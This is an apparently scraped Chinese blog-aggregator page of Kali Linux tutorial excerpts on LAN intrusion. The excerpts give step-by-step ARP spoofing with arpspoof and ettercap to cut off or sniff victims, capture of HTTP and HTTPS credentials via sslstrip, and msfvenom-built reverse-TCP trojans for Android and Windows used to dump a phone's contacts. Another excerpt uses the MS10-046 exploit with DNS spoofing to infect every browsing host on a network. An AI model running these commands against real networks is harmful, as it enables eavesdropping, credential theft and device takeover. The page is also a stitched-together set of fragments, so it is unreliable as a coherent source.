精华内容
下载资源
问答
  • kali入侵win7.txt

    2019-07-23 13:58:13
    整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
  • kali局域网攻击(一)

    千次阅读 多人点赞 2021-03-24 19:58:51
    这里使用netdiscover 当然这里也写几个nmap之类的指令 nmap -PR -sL ip fping -asg ip netdiscover -i kali网卡 -r ip(网段) netdiscover -i eth0 -r 192.168.43.1/30 扫描速度是比较慢的 断网攻击 arpspoof -i ...

    前言

    很久以前的博客才发现,发布一下。
    这个系列以后有时间再做。

    arp攻击

    arp路由链表,感兴趣的自行百度,我的博客我的笔记.
    路由指向
    介绍两个东西.

    echo 0 >/proc/sys/net/ipv4/ip_forward #让经过的数据不留通
    echo 1 >/proc/sys/net/ipv4/ip_forward #让数据流通
    

    内网扫描
    这个在百度上你可以看到很多相关的方式,比如nmap fping
    但是基本上扫描结果不太号,在虚拟机上你会发现你把主机的防火墙关了都扫不到主机.
    这里使用netdiscover
    当然这里也写几个nmap之类的指令

    nmap -PR -sL ip
    fping -asg ip
    netdiscover -i kali网卡 -r ip(网段)
    netdiscover -i eth0 -r 192.168.43.1/30
    
    

    扫描速度是比较慢的
    在这里插入图片描述

    断网攻击

    arpspoof -i kali的网卡 -t 目标地址 目标网卡
    
    arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
    

    arp欺骗信息获取

    1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1 开始欺骗让数据经过你的电脑
    2.echo 1 >/proc/sys/net/ipv4/ip_forward 放掉数据包
    获取图片
    使用工具difinet

    difinet -i eth0(网卡)
    

    实际操作:

    在这里插入图片描述
    图片会在那里临时保存
    在这里插入图片描述
    由于网络问题可能会有点卡

    获取HTTP连接的密码信息

    使用ettercap
    其他的操作还是一样的,要开启arp欺骗

    ettercap -Tq -i eth0
    -T 文本模式 q 安静模式 i 网卡
    

    在这里插入图片描述
    然后等待即可.不过现在都是https,作用不大
    出现中文怎么办,直接赋值中文乱码,之后解码即可
    百度搜索url解码
    或者直接使用python

    中文编码
    from urllib.parse import quote,unquote
    str1 = '中国'
    str2=quote(strl)
    print(str2)
    解码
    print(unquote(str2))
    

    获取HTTPS的密码信息

    这个要先修改以下ettercap的配置文件.

    vim /etc/ettercap/etter.conf 
    

    在这里插入图片描述

    使用工具 sslstrip
    那个吐槽一下 kali 2020是没有sslstrip的原因是没有安装python2的pip 只有pip3
    记住一定要先安装python2
    在kali里面python 默认为python2 当然你可以用ln -s 修改一下.
    apt install python 这个时候会自动安装python 2.7
    然后输入以下指令安装sslstrip

    git clone https://github.com/moxie0/sslstrip.git
    cd sslstrip
    python setup.py install 
    

    这个是python2的,如果没猜错可能会遇到OpenSSL报错说没有这个模块

    pip install pyOpenSSL 
    

    确保你的pip是python2的,如何安装pip2自行百度,如果遇到问题可查看此篇博客
    Kali常见问题及解决方案(持续更新的文章)

    展开全文
  • Kali入侵局域网手机

    千次阅读 多人点赞 2021-05-08 23:03:04
    浏览了Kali 入侵局域网手机的文章 自己也来试试 环境 电脑 手机 处于同一局域网 Kali设置桥接模式 手机处于同一WIFI下 (用桥接模式使得可配置其IP地址跟物理主机、手机在同一个网段之中,形成一个小局域网) 1. 准备...

    最近对攻击靶机感兴趣
    浏览了Kali 入侵局域网手机的文章 自己也来试试
    环境
    电脑 手机 处于同一局域网
    Kali设置桥接模式 手机处于同一WIFI下 (用桥接模式使得可配置其IP地址跟物理主机、手机在同一个网段之中,形成一个小局域网)

    1. 准备木马

    1.利用msfvenom生成木马病毒,payload选择android/meterpreter/reverse_tcp,后接kali虚拟机的名字和端口:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=8888 R > /root/android.apk

    在这里插入图片描述
    2.到root 目录 复制生成的木马病毒
    发送到手机端安装
    在这里插入图片描述
    目标靶机上安装完成木马后会出现如下图标:
    在这里插入图片描述

    2. 准备监听
    msf监听

    kali虚拟机终端依次执行以下命令:

    msfconsole        //启动msfconsole

    use exploit/multi/handler  //加载模块

    set payload android/meterpreter/reverse_tcp  //选择payload

    set LHOST 192.168.0.102

    set LPORT 8888

    exploit          //开始执行漏洞,开始监听,等待目标上线
          在这里插入图片描述

    在这里插入图片描述
    发现成功监听
    在这里插入图片描述
    3. 进行攻击
    help 可以查看 各种攻击 这边演示获取通讯录
    dump_contacts
    在这里插入图片描述

    打开存下来的文件 发现获取到通讯录姓名电话
    在这里插入图片描述
    提醒:本实验仅用于技术讨论与学习,严禁用于非法途径,否则后果自负。

    展开全文
  • 利用Kali入侵局域网的手机

    万次阅读 多人点赞 2019-03-30 11:02:36
    生成木马病毒(将生成的apk文件拷贝到手机) msfvenom -p android/meterpreter/reverse_tcp LHOST=*.*.*.*(本地IP) LPORT=*(本地端口) -o *(输出目录) 启动postgresql数据库 service postgresql start ...
    • 生成木马病毒(将生成的apk文件拷贝到手机)
    msfvenom -p android/meterpreter/reverse_tcp LHOST=*.*.*.*(本地IP) LPORT=*(本地端口) -o *(输出目录)
    • 启动postgresql数据库
    service postgresql start
    • 启动msfconsole
    msfconsole
    • 使用探测句柄
    use exploit/multi/handler
    • 设置payload
    set payload android/meterpreter/reverse_tcp
    • 设置本地IP
    set LHOST=*.*.*.*
    • 设置本地端口
    set LPORT=*
    • 进行探测
    exploit
    • 查看可执行的命令
    help

     

    展开全文
  • 物理主机:kali2.0 192.168.1.50目标主机:整个局域网运行msfconsole依次输入:use exploit/windows/browser/ms10_046_shortcut_icon_dllloader //加载10_046浏览器漏洞模块setg SRVHOST 192.168.1.50 //设置全局...

    物理主机:kali2.0 192.168.1.50

    目标主机:整个局域网

    24e7a9019f6d81693f51b33944599426.png

    运行msfconsole

    依次输入:

    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader //加载10_046浏览器漏洞模块

    setg SRVHOST 192.168.1.50 //设置全局服务主机IP

    set PAYLOAD windows/meterpreter/reverse_tcp //加载PAYLOAD攻击模块

    setg LHOST 192.168.1.50 //设置攻击模块全局主机IP

    exploit //攻击

    这么配置只要局域网内有哪一台主机访问到http://192.168.1.50:80/这个链接就会中马。

    然后修改ettercap DNS文件。

    文件目录:/etc/ettercap/etter.dns

    用记事本打开它。

    ctrl+f 搜索

    关键字:# redirect it to http://www.linux.org

    这样修改一下,如图。

    2271cebdb58babf5e38900212051ae74.png

    # redirect it to http://www.linux.org

    在下方依次添加

    * A 192.168.1.50

    * PTR 192.168.1.50

    * .net 192.168.1.50

    * .cn 192.168.1.50

    * .com 192.168.1.50

    然后保存即可。

    4792def6e62b14b9092be49bee0c33a7.png

    打开终端,运行ettercap输入如下命令:

    ettercap -T -q -i eth0 -P dns_spoof -M arp

    -M MAC监听

    -T 脱机监听

    -P 过滤筛选器

    -i 使用此网络接口

    eth0 本机网卡

    ARP拦截局域网所有的DNS映射到本机的etter.dns中

    64c249b58cb0589b2ab24e4b74d3aa25.png

    列表滚动,局域网内已经有机器在打开网页。

    df884d9dbe420f6defe6d04c7858fa19.png

    局域网主机只要一打开网页,DNS都会映射到本机的IP上,淫荡的中马。

    b425d13d93d1591fc81b0043c940efb9.png

    sessions 查看,得到一台主机 192.168.1.12

    dc6cbd47e54728eea3b04ab618ccad02.png

    sessions -i 1 进入劫持会话

    e6d1e531ff66030b93c00e54a353a91a.png

    3603883d86a7531c0e869c84915d0977.png

    shell -在受害者计算机上打开一个shell

    net user // 查看计算机账户

    netstat -ano //查看连接与开放的端口

    这里可以看到192.168.1.12:1074与192.168.1.50:4444端口正在连接。

    7aab0df2b17e2da860a3baff47085cfd.png

    ps -列出正在运行的进程

    getpid -获取当前进程 ID (PID)

    3068

    d120e25cc733de0765c51351ba0d44b8.png

    reboot重启对方计算机,输入后已经与192.168.1.12断开连接。

    展开全文
  • 局域网入侵

    2013-03-15 13:01:43
    菜鸟学习局域网入侵!入门技术应用,适合所有新手。
  • 大致原理: 大家都知道,在一个局域网中,主机是通过路由器向公网进行发送信息,而路由器则是通过主机的MAC地址来给主机传递信息。 每一个主机都有一个arp缓存表来记录ip地址与对应mac地址, ...打开kali ...
  • Kali 局域网 DNS 劫持

    千次阅读 2017-12-26 10:47:00
    1: Kali-linux-2017  2: ettercap 0.8.2 3: web 服务器, 这里以 node 为例 <二> 原理  1: DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求 2: 局域网劫持, 攻击者通过伪装成网关, ...
  • 渗透测试-Kali入侵Win7主机

    万次阅读 多人点赞 2020-02-27 17:26:22
    本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的 Win 7主机,从而实现对被入侵主机实施文件增删、屏幕监控、键盘监听、音频窃听等攻击。 环境说明 机器 IP...
  • kali的实战渗透

    2018-12-14 09:09:43
    写的是kali的实战渗透,其中有讲msf渗透,kali基础命令使用等等等,非常多
  • Kali_linux虚拟机一台 kali虚拟机网卡配置为桥接模式并桥接到物理机网卡。 使用如下命令安装dsniff工具 apt-get install dsniff 二、ARP欺骗攻击 1.通过arp -a检查攻击前的主机arp表,网关mac地址为77-a6-29 ...
  • 今天安仔为大家推荐的工具是linux下运行的入侵工具EtterCap。再次声明,本教程仅供学习交流使用,不得用于非法途径,请大家守住自己的底线,做个有道德的网民。我们在对WEB安全检测的时候都会用到Cain和netfuke这两款...
  • kali Linux局域网渗透之win10

    千次阅读 2021-05-13 10:44:23
    kali机:192.168.198.134win10:192.168.198.1我们先来查看下自己的IP地址watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (587.31 KB, ...
  • https://jingyan.baidu.com/article/5553fa828a1b6e65a339347f.html https://blog.csdn.net/u012749168/article/details/52689705/
  • kali入侵电脑

    千次阅读 2021-11-17 11:51:53
    端口随便填一个这1用6789 use exploit/multi/handler 设置pay load为反向tcp连接:set payload windows/meterpreter/reverse_tcp 设置ip和端口,这个是kali的ip,端口是刚刚生成木马的时候的端口:set lhost 192.168....
  • Kali Linux 获取局域网的照片

    千次阅读 2017-07-21 11:42:27
    1.桥接--> 2.使用命令  -------->ettercap -i 网卡 -Tq -M arp:remote /目标IP//网关/ 3.使用命令查看  ------------>driftnet -i 网卡 -b
  • 使用Kali linux生成木马入侵局域网安卓手机

    万次阅读 多人点赞 2019-04-02 19:45:47
    msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 输入上述命令生成木马,这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多大小 3、...
  • 使用Kali Linux入侵Android手机

    千次阅读 2021-01-12 20:15:11
    文本演示怎么使用Kali Linux入侵Android手机。Kali Linux IP地址:192.168.0.112;接收连接的端口:443。同一局域网内android手机一部(android 5.1)创建一个后门程序在终端中执行:# msfvenom -p android/...
  • kali linux查看局域网下所有IP,并对指定IP实施局域网内攻击 首先我们打开我们熟悉的kali linux操作系统,利用指令: ifconfig 来确认本机的ip地址 确认了本机的ip地址之后,利用一下的指令查看局域网...
  • ————— ——– ———– ls List files dump_calllog Get call log dump_sms Get sms messages kali2.0入侵android手机实战 resource Run the commands stored in a file execute Execute a command ipconfig ...
  • Kali Linux-Metasploit入侵Android手机

    千次阅读 2021-05-17 08:03:56
    kali Linux-Metasploit入侵Android手机写此文章的初衷是为了告诉哪些喜欢蹭别人wifi的人,这样的做法是很危险的哦!Kali Linux IP地址192.168.1.101(虚拟机设置桥接模式)同一局域网内安卓手机一部创建一个后门程序 ...
  • 该文档是入侵局域网他人电脑案例,借鉴思路。
  • 文本演示怎么使用Kali Linux入侵Android手机。Kali Linux IP地址:192.168.0.112;接收连接的端口:443。同一局域网内android手机一部(android 5.1)创建一个后门程序在终端中执行:# msfvenom -p android/...
  • Kali Linux初阶内网渗透教程ARP欺骗开始实验一、将Kali Linux桥接至局域网二、扫描局域网内主机三、进行ARP欺骗四、如何防御ARP攻击 更新时间:2021年1月29日 本教程仅作学习,禁止使用教程内的任何指令对非个人...
  • kali局域网的内的小伙伴断网

    万次阅读 2016-09-27 09:14:16
    kali是一个用于局域网入侵检测的linux系统,挺好用的,想玩的小伙伴可以在自己的虚拟机上安装试试,仅用来学习研究使用,不要用于非法用途哦 第一步、打开终端,输入以下命令,这个命令是扫描192.168.1.0/24这个网段...
  • 利用kali下的msfvenom入侵电脑

    万次阅读 多人点赞 2018-10-28 15:38:52
    msfconsole (kali里面有) msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe 即生成一个后门文件xss.exe(我这里是将文件名命名为xss的) 然后继续执行...
  • kali入侵windows

    千次阅读 2017-12-15 06:36:53
    因为我是一个爱好和平的人(捂嘴笑),所以就在虚拟机中,创建二个系统,一个kali,一个windows xp,来进行这次入侵实验,以此迈入hacke的大门。 ####实验环境 ![实验环境.jpg]...
  • linux内网嗅探,监控局域网内记录

    千次阅读 2018-02-03 18:58:17
    无聊就玩了玩,不要干一些坏事哟~~网上也有一些文章关于kali linux的,就实战了一番。kali是用的debian 。 前提你与女神处于同一wifi下。 找到女神的ip地址,这个点她手机里面的wlan就可以看到。那么也可以用...
  • Kali渗透-ARP断网攻击与监听

    万次阅读 多人点赞 2020-02-29 17:50:25
    演示如何借助Kali Linux系统内置的 nmap、arpspoof、driftnet、ettercap 等渗透测试工具对局域网内(同WIFI下)同一网段的PC主机、手机进行 ARP 欺骗和 流量监听,实现对目标主机/手机的断网攻击、图片窃取、密码监听...
  • kali DOS/DDOS攻击(局域网内)

    千次阅读 2020-12-22 03:17:53
    1.什么是DOS/DDOS攻击?DOS:拒绝服务攻击(Deny Of Service)DDOS:DDOS攻击(Distributed denial of service attack)一般来说DDOS攻击更难防御自认为的区别:DOS是相当于一个进行...进入正题 kali攻击a.tcp攻击(flood...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 739
精华内容 295
关键字:

kali局域网入侵